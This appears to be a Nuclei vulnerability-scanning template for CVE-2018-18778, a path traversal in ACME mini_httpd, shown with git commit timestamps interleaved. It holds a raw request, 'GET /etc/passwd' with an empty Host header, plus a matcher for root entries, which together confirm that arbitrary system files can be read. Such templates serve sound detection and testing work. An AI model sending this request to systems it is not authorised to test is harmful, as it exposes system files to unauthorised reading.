nuclei-templates/cves/2018/CVE-2018-18778.yaml

27 lines
555 B
YAML
Raw Normal View History

2021-02-25 16:05:18 +00:00
id: CVE-2018-18778
info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: high
2021-03-11 16:22:34 +00:00
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
2021-02-25 16:05:18 +00:00
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
tags: cve,cve2018,lfi
2021-03-11 16:22:34 +00:00
2021-02-25 16:05:18 +00:00
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
2021-03-11 20:16:35 +00:00
Host:
2021-02-25 16:05:18 +00:00
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-02-25 16:05:18 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"